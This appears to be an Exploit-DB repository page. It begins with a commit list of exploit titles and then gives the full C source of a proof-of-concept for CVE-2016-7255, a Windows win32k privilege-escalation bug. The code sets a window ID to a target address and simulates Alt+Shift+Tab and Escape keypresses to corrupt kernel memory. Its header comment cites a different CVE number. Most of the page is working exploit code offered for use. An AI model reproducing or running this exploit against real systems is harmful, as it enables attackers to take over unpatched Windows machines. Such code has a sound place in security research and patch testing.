ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
283 lines
No EOL
4.8 KiB
C
283 lines
No EOL
4.8 KiB
C
/*
|
|
Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255
|
|
|
|
Full Proof of Concept:
|
|
|
|
https://github.com/tinysec/public/tree/master/CVE-2016-7255
|
|
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip
|
|
|
|
********************************************************************
|
|
Created: 2016-11-09 14:23:09
|
|
Filename: main.c
|
|
Author: root[at]TinySec.net
|
|
Version 0.0.0.1
|
|
Purpose: poc of cve-2016-0075
|
|
*********************************************************************
|
|
*/
|
|
|
|
#include <windows.h>
|
|
#include <wchar.h>
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
|
|
|
|
//////////////////////////////////////////////////////////////////////////
|
|
#pragma comment(lib,"ntdll.lib")
|
|
#pragma comment(lib,"user32.lib")
|
|
|
|
#undef DbgPrint
|
|
ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );
|
|
ULONG __cdecl DbgPrint(__in char* Format, ...)
|
|
{
|
|
CHAR* pszDbgBuff = NULL;
|
|
va_list VaList=NULL;
|
|
ULONG ulRet = 0;
|
|
|
|
do
|
|
{
|
|
pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));
|
|
if (NULL == pszDbgBuff)
|
|
{
|
|
break;
|
|
}
|
|
RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));
|
|
|
|
va_start(VaList,Format);
|
|
|
|
_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);
|
|
|
|
DbgPrintEx(77 , 0 , pszDbgBuff );
|
|
OutputDebugStringA(pszDbgBuff);
|
|
|
|
va_end(VaList);
|
|
|
|
} while (FALSE);
|
|
|
|
if (NULL != pszDbgBuff)
|
|
{
|
|
HeapFree( GetProcessHeap(), 0 , pszDbgBuff );
|
|
pszDbgBuff = NULL;
|
|
}
|
|
|
|
return ulRet;
|
|
}
|
|
|
|
|
|
int _sim_key_down(WORD wKey)
|
|
{
|
|
INPUT stInput = {0};
|
|
|
|
do
|
|
{
|
|
stInput.type = INPUT_KEYBOARD;
|
|
stInput.ki.wVk = wKey;
|
|
stInput.ki.dwFlags = 0;
|
|
|
|
SendInput(1 , &stInput , sizeof(stInput) );
|
|
|
|
} while (FALSE);
|
|
|
|
return 0;
|
|
}
|
|
|
|
int _sim_key_up(WORD wKey)
|
|
{
|
|
INPUT stInput = {0};
|
|
|
|
do
|
|
{
|
|
stInput.type = INPUT_KEYBOARD;
|
|
stInput.ki.wVk = wKey;
|
|
stInput.ki.dwFlags = KEYEVENTF_KEYUP;
|
|
|
|
SendInput(1 , &stInput , sizeof(stInput) );
|
|
|
|
} while (FALSE);
|
|
|
|
return 0;
|
|
}
|
|
|
|
int _sim_alt_shift_esc()
|
|
{
|
|
int i = 0;
|
|
|
|
do
|
|
{
|
|
_sim_key_down( VK_MENU );
|
|
_sim_key_down( VK_SHIFT );
|
|
|
|
|
|
_sim_key_down( VK_ESCAPE);
|
|
_sim_key_up( VK_ESCAPE);
|
|
|
|
_sim_key_down( VK_ESCAPE);
|
|
_sim_key_up( VK_ESCAPE);
|
|
|
|
_sim_key_up( VK_MENU );
|
|
_sim_key_up( VK_SHIFT );
|
|
|
|
|
|
} while (FALSE);
|
|
|
|
return 0;
|
|
}
|
|
|
|
|
|
|
|
int _sim_alt_shift_tab(int nCount)
|
|
{
|
|
int i = 0;
|
|
HWND hWnd = NULL;
|
|
|
|
|
|
int nFinalRet = -1;
|
|
|
|
do
|
|
{
|
|
_sim_key_down( VK_MENU );
|
|
_sim_key_down( VK_SHIFT );
|
|
|
|
|
|
for ( i = 0; i < nCount ; i++)
|
|
{
|
|
_sim_key_down( VK_TAB);
|
|
_sim_key_up( VK_TAB);
|
|
|
|
Sleep(1000);
|
|
|
|
}
|
|
|
|
|
|
_sim_key_up( VK_MENU );
|
|
_sim_key_up( VK_SHIFT );
|
|
} while (FALSE);
|
|
|
|
return nFinalRet;
|
|
}
|
|
|
|
|
|
|
|
int or_address_value_4(__in void* pAddress)
|
|
{
|
|
WNDCLASSEXW stWC = {0};
|
|
|
|
HWND hWndParent = NULL;
|
|
HWND hWndChild = NULL;
|
|
|
|
WCHAR* pszClassName = L"cve-2016-7255";
|
|
WCHAR* pszTitleName = L"cve-2016-7255";
|
|
|
|
void* pId = NULL;
|
|
MSG stMsg = {0};
|
|
|
|
do
|
|
{
|
|
|
|
stWC.cbSize = sizeof(stWC);
|
|
stWC.lpfnWndProc = DefWindowProcW;
|
|
stWC.lpszClassName = pszClassName;
|
|
|
|
if ( 0 == RegisterClassExW(&stWC) )
|
|
{
|
|
break;
|
|
}
|
|
|
|
hWndParent = CreateWindowExW(
|
|
0,
|
|
pszClassName,
|
|
NULL,
|
|
WS_OVERLAPPEDWINDOW|WS_VISIBLE,
|
|
0,
|
|
0,
|
|
360,
|
|
360,
|
|
NULL,
|
|
NULL,
|
|
GetModuleHandleW(NULL),
|
|
NULL
|
|
);
|
|
|
|
if (NULL == hWndParent)
|
|
{
|
|
break;
|
|
}
|
|
|
|
hWndChild = CreateWindowExW(
|
|
0,
|
|
pszClassName,
|
|
pszTitleName,
|
|
WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,
|
|
0,
|
|
0,
|
|
160,
|
|
160,
|
|
hWndParent,
|
|
NULL,
|
|
GetModuleHandleW(NULL),
|
|
NULL
|
|
);
|
|
|
|
if (NULL == hWndChild)
|
|
{
|
|
break;
|
|
}
|
|
|
|
#ifdef _WIN64
|
|
pId = ( (UCHAR*)pAddress - 0x28 );
|
|
#else
|
|
pId = ( (UCHAR*)pAddress - 0x14);
|
|
#endif // #ifdef _WIN64
|
|
|
|
SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );
|
|
|
|
DbgPrint("hWndChild = 0x%p\n" , hWndChild);
|
|
DebugBreak();
|
|
|
|
ShowWindow(hWndParent , SW_SHOWNORMAL);
|
|
|
|
SetParent(hWndChild , GetDesktopWindow() );
|
|
|
|
SetForegroundWindow(hWndChild);
|
|
|
|
_sim_alt_shift_tab(4);
|
|
|
|
SwitchToThisWindow(hWndChild , TRUE);
|
|
|
|
_sim_alt_shift_esc();
|
|
|
|
|
|
while( GetMessage(&stMsg , NULL , 0 , 0) )
|
|
{
|
|
TranslateMessage(&stMsg);
|
|
DispatchMessage(&stMsg);
|
|
}
|
|
|
|
|
|
} while (FALSE);
|
|
|
|
if ( NULL != hWndParent )
|
|
{
|
|
DestroyWindow(hWndParent);
|
|
hWndParent = NULL;
|
|
}
|
|
|
|
if ( NULL != hWndChild )
|
|
{
|
|
DestroyWindow(hWndChild);
|
|
hWndChild = NULL;
|
|
}
|
|
|
|
UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );
|
|
|
|
return 0;
|
|
}
|
|
|
|
int __cdecl wmain(int nArgc, WCHAR** Argv)
|
|
{
|
|
do
|
|
{
|
|
or_address_value_4( (void*)0xFFFFFFFF );
|
|
} while (FALSE);
|
|
|
|
return 0;
|
|
} |